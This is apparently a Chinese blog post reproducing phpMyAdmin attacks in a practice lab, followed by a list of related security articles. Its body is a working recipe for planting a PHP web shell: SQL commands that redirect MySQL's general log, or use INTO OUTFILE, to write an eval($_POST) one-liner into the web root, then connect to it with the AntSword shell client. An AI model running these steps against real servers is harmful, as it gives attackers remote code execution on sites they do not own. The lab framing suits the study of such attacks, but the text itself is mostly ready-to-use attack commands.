PhPMyadmin-cms漏洞复现

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码
show global variables like '%general%';
复制代码
set global general_log='on'; //⽇志保存状态开启;
复制代码
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码
show global variables like '%general%';
复制代码
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
Suckerbin5 分钟前
基于HTTP头部字段的SQL注入:SQLi-labs第17-20关
网络·笔记·网络协议·安全·http·网络安全
csKQL4 小时前
第一章 应急响应-webshell查杀
网络安全·应急响应·玄机
第十六年盛夏.5 小时前
【网络安全】SQL注入
sql·web安全·网络安全
玥轩_5215 小时前
BUUCTF 大流量分析(三) 1
安全·网络安全·wireshark·ctf·misc·buuctf·大流量分析
芯盾时代10 小时前
数据出境的安全合规思考
大数据·人工智能·安全·网络安全·信息与通信
网络空间小黑11 小时前
WEB渗透测试----信息收集
服务器·前端·网络·安全·web安全·网络安全
上海云盾商务经理杨杨11 小时前
2025年网站安全防御全解析:应对DDoS与CC攻击的智能策略
安全·web安全·网络安全·ddos
一口一个橘子21 小时前
[ctfshow web入门] web69
前端·web安全·网络安全
南暮思鸢1 天前
应急响应基础模拟靶机-security2
linux·网络安全·write up·应急响应靶机
路baby1 天前
2025第九届御网杯网络安全大赛线上赛 区域赛WP (MISC和Crypto)(详解-思路-脚本)
安全·web安全·网络安全·视频编解码·misc·crypto·御网杯